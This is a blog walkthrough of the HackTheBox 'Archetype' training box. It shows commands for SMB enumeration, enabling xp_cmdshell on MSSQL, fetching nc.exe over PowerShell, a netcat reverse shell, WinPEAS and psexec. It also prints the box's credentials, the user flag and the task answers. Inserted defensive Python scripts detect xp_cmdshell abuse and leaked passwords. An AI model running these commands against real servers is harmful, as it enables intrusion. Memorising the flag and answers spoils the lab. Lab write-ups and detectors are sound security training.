Archetype HackTheBox Walkthrough

Nihir Zala
7 min read · Jan 20, 2023

In this walkthrough I will demonstrate the path to solving this box, both following the official HTB walkthrough and with some alternative methods that reach the same result. If you want to follow along, here is the box link:
https://app.hackthebox.com/starting-point

Now Let’s Begin 🚀

Step 1 (Scanning) :
First, we scan the target machine with Nmap to see which services are running.

nmap -sC -sV -A [Target_IP]

The result will look something like this:

From this we can conclude that the following services are exposed:
* RPC on 135
* netBios-ssn (samba) on 139
* MsSql on 1433

Next, run smbclient to see what is there. Use this command to list the shares present on the server:

smbclient -N -L \\\\[Target_IP]\\

We get results like this:

We can see there is a backups share, so let's connect to 'backups' and grab its contents (in our case there is only one file of interest to us, "prod.dtsConfig"):

smbclient -N \\\\[Target_IP]\\backups
smb: \> ls
smb: \> get prod.dtsConfig

[IMP !] The file is saved on our local machine in the directory from which smbclient was run.

Let's analyse the file:

From it we get the password for MsSql, so let's copy it somewhere safe.

Password: M3g4c0rp123
User : Archetype/sql_svc

Step 2 :

Now let's log in to the MsSql server remotely. How do we do that? A quick Google search turns up a tool named "mssqlclient.py", which lets us log in to the target's MsSql server.

Download this tool :
1. git clone https://github.com/SecureAuthCorp/impacket.git
2. Navigate to the folder — cd impacket
3. pip3 install -r requirements.txt
4. python3 setup.py install

After installing let’s run this tool :

python3 /opt/impacket/examples/mssqlclient.py Archetype/sql_svc@[Target_IP] -windows-auth

Enter the password and voila, we are logged in.

We are logged in, but what can we do here? Let's research whether we can execute a command shell from mssqlclient.py, and we find something:

xp_cmdshell. Let's try it:

EXEC xp_cmdshell 'net user'

But here we get an error. It seems xp_cmdshell is not enabled yet, so we need to find out how to enable it, and Microsoft's documentation helps us again:

First, we need to check our Roles on the server :

SELECT is_srvrolemember('sysadmin');

This returns 1, which means true, so we can proceed:

Follow these steps :

EXECUTE sp_configure 'show advanced options',1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell',1;
RECONFIGURE;

Now try running :

xp_cmdshell "whoami"

Now it’s working and this command will return us “archetype/sql_svc”.

Step 3 (Stable shell):

Our shell works, but we don't want to keep executing commands like this, so let's get a stable shell. After some searching we found an article:
https://pentestwiki.org/academy/how-to-get-a-xp_cmdshell-reverse-shell/

We will follow the last method: xp_cmdshell with nc.

  • Here first we have to download nc.exe on our local system, which can be downloaded from the link: https://github.com/int0x33/nc.exe/blob/master/nc.exe
  • After downloading let’s set up a python server on our machine in order to send the file to the target system.
python3 -m http.server
(Keep in mind to run the server in the folder where your nc.exe file is present.)
  • We will use the following command to get the file on our target system:
xp_cmdshell "powershell.exe wget http://[Your_tun0_IP]:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"
(We don't need the rest of the command shown in the article, because we are already connected to SQL Server and already logged in with valid credentials.)
  • If the file transferred successfully we will see something like this in our server instance:
root@ip-10-10-204-169:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.102.63 - - [22/Feb/2022 09:12:04] "GET /nc.exe HTTP/1.1" 200 -
  • The next step is to execute the file in our target system for the reverse shell. So for that first, let’s set up our Netcat listener on our system:
nc -lvnp 4444
  • Then execute the following command on the target system:
xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe [Your_tun0_IP] 4444"

And Voila!! we have our shell 🎉
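From the defender's side, the enable-then-execute sequence above (sp_configure 'xp_cmdshell', then xp_cmdshell running a PowerShell download and nc.exe) leaves a distinctive trail in SQL Server audit or Extended Events records. The following Python example is added here and is not part of the original post: it triages constructed statement records, flagging the configuration change and every xp_cmdshell execution, and rates commands carrying download or network indicators highest. The logins, IP address and statements in the sample are constructed.

```python
import re
from dataclasses import dataclass

# Constructed (login, statement) records, in the shape a SQL Server Audit or
# Extended Events sql_statement_completed session would record; not real data.
SAMPLE_STATEMENTS = [
    ("sql_svc", "SELECT is_srvrolemember('sysadmin');"),
    ("sql_svc", "EXECUTE sp_configure 'show advanced options',1;"),
    ("sql_svc", "RECONFIGURE;"),
    ("sql_svc", "EXECUTE sp_configure 'xp_cmdshell',1;"),
    ("sql_svc", "RECONFIGURE;"),
    ("sql_svc", 'xp_cmdshell "whoami"'),
    ("sql_svc", 'xp_cmdshell "powershell.exe wget http://10.10.14.5:8000/nc.exe'
                ' -OutFile c:\\Users\\Public\\nc.exe"'),
    ("reporting", "SELECT TOP 10 * FROM Sales.Orders;"),
]

# Configuration change that turns the extended procedure on
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
# Any invocation of the extended procedure
EXEC_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# Tokens typical of staging a binary or opening a connection from the OS command
NETWORK_RE = re.compile(
    r"powershell|wget|curl|certutil|invoke-webrequest|https?://|nc\.exe|\s-e\s", re.I)

@dataclass
class Finding:
    login: str
    severity: str
    reason: str
    statement: str

def triage(records):
    """Return one Finding per statement that enables or uses xp_cmdshell."""
    findings = []
    for login, stmt in records:
        if ENABLE_RE.search(stmt):
            findings.append(Finding(login, "high", "xp_cmdshell enabled via sp_configure", stmt))
        elif EXEC_RE.search(stmt):
            if NETWORK_RE.search(stmt):
                findings.append(Finding(login, "critical",
                                        "xp_cmdshell OS command with download/network indicators", stmt))
            else:
                findings.append(Finding(login, "medium", "xp_cmdshell OS command", stmt))
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_STATEMENTS):
        print(f"[{f.severity:8}] {f.login}: {f.reason} :: {f.statement}")
```

In a real deployment the records would come from a SQL Server Audit targeting the SCHEMA_OBJECT_ACCESS_GROUP and SERVER_OPERATION_GROUP actions rather than a hard-coded list.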

Step 4 (Finding Our Flags and Privilege Escalation):

Now that we have a stable shell, the next step is to find the flags. The user flag is in the Desktop folder, so let's navigate there:

cd \
cd Users
cd sql_svc
cd Desktop
type user.txt

And we have our User Flag 🚩

Next we have to find the root flag. For that we need to switch to Administrator, but we can't do it just like that: we need Administrator privileges to read the file from the Administrator's folder.

Here comes Privilege Escalation

We need something that can tell us the weak points in the system so that we can exploit them and get root access. Doing this manually would be a lengthy process, and upon searching we found a tool known as "WinPEAS".

WinPEAS is an extremely useful tool that enumerates the system for us and finds weaknesses.

To run this tool we first need to send it to the target system. Let's do it then, starting the HTTP server again on our machine:

python3 -m http.server
  • Get our file in our target system. We need to switch to PowerShell because cmd.exe doesn’t have wget:
powershell
wget http://[Your_tun0_IP]:8000/winPEASx64.exe -outfile winPEASx64.exe
  • Confirm the transfer as we did above when we were transferring “nc.exe”
  • Now run the tool using the command: “./winPEASx64.exe”
  • When it finishes, look near the end of its output:
  • Notice the file named “ConsoleHost_history.txt”. Let’s navigate to this file and see what’s in there.
cd \
cd Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
type ConsoleHost_history.txt

Here is our gift 🎁
User: administrator
Password: MEGACORP_4dm1n!!
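Both credential leaks this box turns on, the connection string in prod.dtsConfig and the administrator password left in ConsoleHost_history.txt, are exactly what a periodic secrets audit of shares and user profiles should catch before an attacker does. This Python example is added here and is not from the original post: it scans a constructed dtsConfig document and constructed PSReadLine history lines for embedded credentials. The paths, account names and passwords in the samples are placeholders, not the box's real values.

```python
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for a DTS package configuration found on a share.
# The real prod.dtsConfig from the box is not reproduced; values are placeholders.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <Configuration ConfiguredType="Property"
    Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=EXAMPLE_PASSWORD_1;User ID=EXAMPLE\\svc;Initial Catalog=Catalog;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

# Constructed PSReadLine history (ConsoleHost_history.txt is one command per line).
SAMPLE_HISTORY = """Get-ChildItem C:\\backups
net.exe use T: \\\\fileserver\\backups /user:EXAMPLE\\administrator EXAMPLE_PASSWORD_2
Get-Date"""

# key=value credentials as found in connection strings
PASSWORD_KV_RE = re.compile(r"\b(?:password|pwd)\s*=\s*([^;\"']+)", re.I)
# net use with the password passed after /user:
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*\s/user:\S+\s+\S+", re.I)
# SecureString built from a literal, which leaves the literal in history
PLAINTEXT_RE = re.compile(r"ConvertTo-SecureString\b.*-AsPlainText", re.I)

def scan_dtsconfig(xml_text):
    """Return (Path, description) for each ConnectionString carrying a password."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        match = PASSWORD_KV_RE.search(conf.findtext("ConfiguredValue") or "")
        if match:
            findings.append((conf.get("Path"),
                             f"embedded password ({len(match.group(1))} chars)"))
    return findings

def scan_history(history_text):
    """Return (line number, command) for history lines passing credentials inline."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        if NET_USE_RE.search(line) or PASSWORD_KV_RE.search(line) or PLAINTEXT_RE.search(line):
            findings.append((lineno, line.split()[0]))
    return findings

if __name__ == "__main__":
    print(scan_dtsconfig(SAMPLE_DTSCONFIG))
    print(scan_history(SAMPLE_HISTORY))
```

The reports deliberately give only the length of a found password, so the audit output itself does not become another copy of the secret.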

Now we need a way to log in as Administrator on the target PC; we cannot simply switch user from our Windows PowerShell shell the way we would on a Linux system. Impacket's psexec.py will help us here.

  • Kill the PowerShell and mssqlclient on our machine.
  • Let’s use our tool:
python3 /opt/impacket/examples/psexec.py administrator@[Target_IP]
  • Here we have our Shell with Root Access

Now let’s navigate to our Administrator Desktop to claim our Root flag 🚩

we have PWNED the machine!!

Task Questions:

Task 1 : Which TCP port is hosting a database server?
> 1433

Task 2 : What is the name of the non-Administrative share available over SMB?
> backups

Task 3 : What is the password identified in the file on the SMB share?
> M3g4c0rp123

Task 4 : What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
> mssqlclient.py

Task 5 : What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
> xp_cmdshell

Task 6 : What script can be used in order to search possible paths to escalate privileges on Windows hosts?
> winpeas

Task 7 : What file contains the administrator’s password?
> ConsoleHost_history.txt

Task 8 : Submit user flag
> 3e7b102e78218e935bf3f4951fec21a3

Task 9: Submit the root flag
> Try to Find it yourself !! Best of Luck 😃



Written by Nihir Zala

Hi there, I'm Nihir Zala—a Laravel developer from Gujrat, India, with over 2.5 years of professional experience. I am also learning pentesting from THM and HTB.
